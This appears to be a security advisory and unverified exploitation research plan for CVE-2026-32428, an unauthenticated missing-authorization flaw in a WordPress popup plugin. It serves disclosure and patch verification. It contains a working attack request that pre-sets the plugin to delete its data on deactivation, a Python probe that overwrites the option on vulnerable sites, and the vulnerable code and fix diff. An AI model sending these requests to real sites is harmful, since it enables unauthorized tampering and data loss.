CVE-2026-32428

Popup Like box <= 3.7.7 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 3.7.8
Time to patch: 46d

Description

The Popup Like box plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.7.7. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions: <=3.7.7
Published: March 1, 2026
Last updated: April 15, 2026

What Changed in the Fix

Changes introduced in v3.7.8


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan - CVE-2026-32428

1. Vulnerability Summary

The Popup Like box – Page Plugin (versions <= 3.7.7) contains a "Missing Authorization" vulnerability. Specifically, the plugin registers AJAX handlers for both authenticated and unauthenticated users (wp_ajax_ and wp_ajax_nopriv_) without implementing capability checks or nonce verification in the handler functions.

The most critical entry point is the deactivate_plugin_option_fb action, which backs the "keep data / delete data" choice offered when the plugin is deactivated. The handler stores whatever upgrade_plugin value it receives in the ays_fb_upgrade_plugin option without any authorization or nonce check. An unauthenticated attacker can therefore pre-select the "Uninstall" behaviour, so that the plugin's configuration and database tables are deleted the next time an administrator deactivates the plugin, leading to a loss of data and functional disruption (Denial of Service of the plugin's features).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: deactivate_plugin_option_fb
  • Parameter: upgrade_plugin (boolean-ish string; read via $_REQUEST, so it can be supplied by GET or POST)
  • Authentication: None (Unauthenticated)
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Registration: In includes/class-ays-facebook-popup-likebox.php, the define_admin_hooks() method registers the AJAX actions:
    $this->loader->add_action( 'wp_ajax_deactivate_plugin_option_fb', $plugin_admin, 'deactivate_plugin_option');
    $this->loader->add_action( 'wp_ajax_nopriv_deactivate_plugin_option_fb', $plugin_admin , 'deactivate_plugin_option');
    
  2. Trigger: An attacker sends a POST request to admin-ajax.php with action=deactivate_plugin_option_fb.
  3. Execution: The request is routed to Ays_Facebook_Popup_Likebox_Admin::deactivate_plugin_option.
  4. Logic: The function reads upgrade_plugin from $_REQUEST and writes it unchanged into the ays_fb_upgrade_plugin option (add_option() on first use, update_option() afterwards), then echoes the stored value back as JSON. It deletes nothing itself. admin.js sends this value from the deactivation dialog, where false is labelled "Uninstall: Your data will be deleted completely."; the stored option is therefore consumed later by the plugin's deactivation logic, which (inferred, not shown on this page) calls delete_option() or DROP TABLE on the plugin's custom tables.

4. Nonce Acquisition Strategy

According to the source code and the vulnerability type, no nonce is required.

  • Verification: In admin/class-ays-facebook-popup-likebox-admin.php, the localization for the script handling this AJAX (fb_likebox_ajax) only includes the ajax_url:
    wp_localize_script($this->plugin_name . '-admin', 'fb_likebox_ajax', array('ajax_url' => admin_url('admin-ajax.php')));
    
  • No nonce is generated or passed to the admin.js script.
  • The admin.js file confirms this by sending only action and upgrade_plugin in the data object.

5. Exploitation Strategy

The goal is to set the ays_fb_upgrade_plugin option to "false" without authorization, so that the plugin's data is permanently deleted when an administrator next deactivates the plugin.

Step 1: Trigger Data Deletion

Send a POST request to the AJAX endpoint.

  • URL: http://TARGET_URL/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=deactivate_plugin_option_fb&upgrade_plugin=false
    

6. Test Data Setup

  1. Install and Activate: Ensure ays-facebook-popup-likebox version 3.7.7 is installed and active.
  2. Verify Initial State:
    • Check for the existence of the plugin's main settings option:
      wp option get ays_fb_likebox_settings (or similar, based on ays-facebook-popup-likebox settings naming convention).
    • Check for database tables:
      wp db query "SHOW TABLES LIKE '%ays_fpl%';"
  3. Create a Sample Likebox: Create at least one likebox via the admin UI or CLI to ensure there is data to be deleted.

7. Expected Results

  • The AJAX request returns HTTP 200 with the JSON body {"option":"false"} (the handler echoes the stored option back).
  • The ays_fb_upgrade_plugin option in the wp_options table now holds the attacker-supplied value "false".
  • Nothing else changes until an administrator deactivates the plugin; at that point, according to the Research Findings below, the deactivation logic is expected to delete the plugin's configuration options and drop (or empty) its custom database tables.
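As an added example (not code from the advisory or the plugin), the following Python script performs the request from section 5 and interprets the response as described in section 7. It defaults to upgrade_plugin=true on the inference, taken from the admin.js labelling quoted in section 3, that false is the destructive "Uninstall" value; a vulnerable site still has its ays_fb_upgrade_plugin option overwritten by the probe, so run it only against sites you are authorised to test. The response mapping assumes WordPress core behaviour (check_ajax_referer() failing with "-1" and HTTP 403, an action without a nopriv hook answering "0") plus the empty-option reply visible in the 3.7.8 handler; the sample responses are constructed for the demo, not captured from any site, and the base URL is whatever you pass on the command line.

```python
"""Probe for CVE-2026-32428 (added example; not code from the advisory or the plugin).

Sends the section 5 request to admin-ajax.php and classifies the answer using
behaviour visible on this page: the 3.7.7 handler echoes the stored option as
JSON, and the 3.7.8 handler calls check_ajax_referer() before anything else.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

ACTION = "deactivate_plugin_option_fb"

# Assumption: 'false' is the destructive "Uninstall" value (admin.js labelling quoted in
# section 3), so 'true' is used as the less harmful probe value. A vulnerable site still
# has its ays_fb_upgrade_plugin option overwritten by the probe.
SAFE_VALUE = "true"


def build_probe(base_url: str, upgrade_value: str = SAFE_VALUE) -> tuple:
    """Return (url, form-encoded body) for the unauthenticated AJAX request."""
    url = base_url.rstrip("/") + "/wp-admin/admin-ajax.php"
    body = urllib.parse.urlencode({"action": ACTION, "upgrade_plugin": upgrade_value})
    return url, body.encode()


def classify(status: int, body: str, sent_value: str) -> str:
    """Map an admin-ajax.php response to a verdict.

    vulnerable      handler stored and echoed our value: {"option":"<sent_value>"}
    patched         nonce check rejected us (WordPress core dies with "-1"/403 when
                    check_ajax_referer() fails; assumption about core behaviour), or
                    the 3.7.8 handler answered {"option":""}
    not-registered  "0", WordPress core's reply for an action with no nopriv hook
                    (plugin inactive or hook removed; assumption about core behaviour)
    unknown         anything else (WAF page, HTML error, redirect body, ...)
    """
    text = body.strip()
    if status == 403 or text == "-1":
        return "patched"
    if text == "0":
        return "not-registered"
    try:
        data = json.loads(text)
    except ValueError:
        return "unknown"
    option = data.get("option") if isinstance(data, dict) else None
    if option == sent_value:
        return "vulnerable"
    if option == "":
        return "patched"
    return "unknown"


def probe(base_url: str, upgrade_value: str = SAFE_VALUE, timeout: float = 10.0) -> str:
    """Send the probe and return the verdict. Only this function touches the network."""
    url, body = build_probe(base_url, upgrade_value)
    req = urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "User-Agent": "cve-2026-32428-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, text = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 400/403 bodies still carry the verdict
        status, text = err.code, err.read().decode("utf-8", "replace")
    return classify(status, text, upgrade_value)


# Constructed sample responses (not captured from any real site), one per verdict.
SAMPLE_RESPONSES = {
    "3.7.7, unauthenticated": (200, '{"option":"true"}'),
    "3.7.8, unauthenticated": (403, "-1"),
    "plugin inactive": (400, "0"),
    "WAF block page": (200, "<html><body>Blocked</body></html>"),
}


def demo(sent_value: str = SAFE_VALUE) -> dict:
    """Run the classifier over the constructed samples; returns {label: verdict}."""
    return {label: classify(status, body, sent_value)
            for label, (status, body) in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(probe(sys.argv[1]))          # e.g. python3 check.py https://example.test
    else:
        for label, verdict in demo().items():
            print(f"{label}: {verdict}")
```

The verdict is based on the body rather than the status code alone because admin-ajax.php answers 200 for both the vulnerable echo and the 3.7.8 empty-option path; a "vulnerable" verdict is only returned when the handler echoes exactly the value that was sent, which is the behaviour the 3.7.7 code above exhibits and the fixed code cannot.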

8. Verification Steps

After performing the exploit, verify the impact using WP-CLI:

  1. Check the Option Immediately:
    wp option get ays_fb_upgrade_plugin
    Expected Result: false (the attacker-supplied value was stored without authorization).
  2. Deactivate the Plugin as an Administrator:
    wp plugin deactivate ays-facebook-popup-likebox (or use the Plugins screen). This is the step at which the stored value is expected to trigger data deletion.
  3. Check Options:
    wp option get ays_fb_likebox_settings
    Expected Result: Error: "Could not find the option with key..."
  4. Check Tables:
    wp db query "SHOW TABLES LIKE '%ays_fpl%';"
    Expected Result: Empty result (tables are gone).
  5. Check Frontend:
    Reactivate the plugin (wp plugin activate ays-facebook-popup-likebox) and navigate to a page where a Likebox was previously displayed.
    Expected Result: The previously created Likebox no longer exists and no longer appears.

9. Alternative Approaches

Secondary Target: Dismiss Banner

The action ays_fpl_dismiss_button is also registered via nopriv and likely lacks authorization.

  • Action: ays_fpl_dismiss_button
  • Body: action=ays_fpl_dismiss_button
  • Impact: While less severe, this allows an unauthenticated user to dismiss admin notices for the site administrator, interfering with the administrative interface.

Reverse Logic: Upgrade Flag

Try setting upgrade_plugin=true. If the plugin code is poorly structured, even the "Upgrade" branch might modify options or state in an unauthorized way, though upgrade_plugin=false (Uninstall) is the primary path for confirming "Missing Authorization" causing impact.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Popup Like box plugin for WordPress allows unauthenticated attackers to modify plugin settings due to a missing authorization check and missing nonce verification on the 'deactivate_plugin_option_fb' AJAX action. By manipulating the 'ays_fb_upgrade_plugin' option, an attacker can influence the plugin's behavior during deactivation, potentially leading to the complete deletion of plugin data and tables when an administrator subsequently deactivates the plugin.

Vulnerable Code

// includes/class-ays-facebook-popup-likebox.php (registration of AJAX handlers for unauthenticated users)
$this->loader->add_action( 'wp_ajax_deactivate_plugin_option_fb', $plugin_admin, 'deactivate_plugin_option');
$this->loader->add_action( 'wp_ajax_nopriv_deactivate_plugin_option_fb', $plugin_admin , 'deactivate_plugin_option');

---

// admin/class-ays-facebook-popup-likebox-admin.php (vulnerable handler function)
public function deactivate_plugin_option(){
    error_reporting(0);
    // No nonce check and no capability check; $_REQUEST also accepts GET parameters.
    $request_value = $_REQUEST['upgrade_plugin'];
    $upgrade_option = get_option('ays_fb_upgrade_plugin','');
    if($upgrade_option === ''){
        add_option('ays_fb_upgrade_plugin',$request_value);
    }else{
        // Attacker-controlled value is stored as-is and read later by the deactivation logic.
        update_option('ays_fb_upgrade_plugin',$request_value);
    }
    echo json_encode(array('option'=>get_option('ays_fb_upgrade_plugin','')));
    wp_die();
}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.7/admin/class-ays-facebook-popup-likebox-admin.php /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.8/admin/class-ays-facebook-popup-likebox-admin.php
--- /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.7/admin/class-ays-facebook-popup-likebox-admin.php	2025-04-30 11:41:30.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ays-facebook-popup-likebox/3.7.8/admin/class-ays-facebook-popup-likebox-admin.php	2026-02-18 08:15:24.000000000 +0000
@@ -211,10 +211,15 @@
         /*
         *  Documentation : https://codex.wordpress.org/Plugin_API/Filter_Reference/plugin_action_links_(plugin_file_name)
         */
+
+        $ays_fb_ajax_deactivate_plugin_nonce = wp_create_nonce( 'ays-facebook-popup-likebox-ajax-deactivate-plugin-nonce' );
+
         $settings_link = array( 
             '<a href="' . admin_url( 'options-general.php?page=' . $this->plugin_name ) . '">' . __('Settings', $this->plugin_name) . '</a>',
             '<a href="https://plugins.ays-demo.com/popup-likebox-free-demo/" target="_blank">' . __('Demo', $this->plugin_name) . '</a>',
             '<a href="https://ays-pro.com/wordpress/facebook-popup-likebox" target="_blank" style="color:red; font-weight: bold;">' . __('Buy Now', $this->plugin_name) . '</a>',
+            
+            '<input type="hidden" id="ays_fb_ajax_deactivate_plugin_nonce" name="ays_fb_ajax_deactivate_plugin_nonce" value="' . $ays_fb_ajax_deactivate_plugin_nonce .'">',
         );
         return array_merge(  $settings_link, $links );
 
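Review bot: the nonce is delivered as an `<input type="hidden">` entry appended to the $settings_link array of the plugin_action_links filter, so it only exists on the Plugins list screen and is rendered as one of the plugin's action "links", which is fragile and mixes form markup into a list that core and other plugins expect to contain anchors. Pass it to admin.js through the existing wp_localize_script call next to ajax_url instead (e.g. 'nonce' => wp_create_nonce( 'ays-facebook-popup-likebox-ajax-deactivate-plugin-nonce' )). The admin.js change that reads #ays_fb_ajax_deactivate_plugin_nonce and sends it as _ajax_nonce is not part of this diff and should be confirmed, otherwise the new check_ajax_referer() call below rejects the plugin's own deactivation dialog.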
@@ -251,17 +256,44 @@
 		$this->fblikebox_obj = new FB_Popup_Likebox_List_Table($this->plugin_name);
 	}
 
-	public function deactivate_plugin_option(){
-        error_reporting(0);
-        $request_value = $_REQUEST['upgrade_plugin'];
-        $upgrade_option = get_option('ays_fb_upgrade_plugin','');
-        if($upgrade_option === ''){
-            add_option('ays_fb_upgrade_plugin',$request_value);
-        }else{
-            update_option('ays_fb_upgrade_plugin',$request_value);
+    public function deactivate_plugin_option_fb(){
+
+        // Run a security check.
+        check_ajax_referer( 'ays-facebook-popup-likebox-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );
+
+        // Check for permissions.
+        if ( ! current_user_can( 'manage_options' ) ) {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
         }
-        echo json_encode(array('option'=>get_option('ays_fb_upgrade_plugin','')));
-        wp_die();
+
+        if( is_user_logged_in() ) {
+            $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );
+            $upgrade_option = get_option('ays_fb_upgrade_plugin','');
+            if($upgrade_option === ''){
+                add_option('ays_fb_upgrade_plugin',$request_value);
+            }else{
+                update_option('ays_fb_upgrade_plugin',$request_value);
+            }
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => get_option('ays_fb_upgrade_plugin', '')
+            ));
+            wp_die();
+        } else {
+            ob_end_clean();
+            $ob_get_clean = ob_get_clean();
+            echo json_encode(array(
+                'option' => ''
+            ));
+            wp_die();
+        }
+
     }
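Review bot: the handler is renamed from deactivate_plugin_option to deactivate_plugin_option_fb, but the loader registrations in includes/class-ays-facebook-popup-likebox.php (quoted under Vulnerable Code above) bind the callback name 'deactivate_plugin_option'; that file is not in this diff, so confirm both add_action calls were updated, otherwise the action maps to a method that no longer exists. Since the action is now admin-only, drop the wp_ajax_nopriv_ registration rather than keeping it reachable behind the checks. Smaller points in the same hunk: check_ajax_referer() already reads _ajax_nonce from $_REQUEST when its second argument is omitted, so sanitize_key( $_REQUEST['_ajax_nonce'] ) is unnecessary and raises a notice when the parameter is absent; is_user_logged_in() is implied by a passing current_user_can( 'manage_options' ), so the else branch is dead code; esc_sql() is the wrong layer for update_option(), which prepares its own queries, and will store backslashes for quoted input; ob_end_clean() followed by ob_get_clean() with the result unused is a no-op at best and trips a notice when no buffer is open; and unauthorised callers should get wp_send_json_error() with a 403 rather than a 200 carrying an empty option.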

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker sends a POST request (a GET request works equally, since the handler reads $_REQUEST) to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with the action parameter set to 'deactivate_plugin_option_fb' and the 'upgrade_plugin' parameter set to 'false'. Because the plugin checks neither user capabilities nor a security nonce, it writes that value into the 'ays_fb_upgrade_plugin' option and echoes it back as {"option":"false"}. With the option set to 'false', the plugin's deactivation logic will drop its database tables and delete its settings the next time an administrator deactivates the plugin, causing permanent data loss.
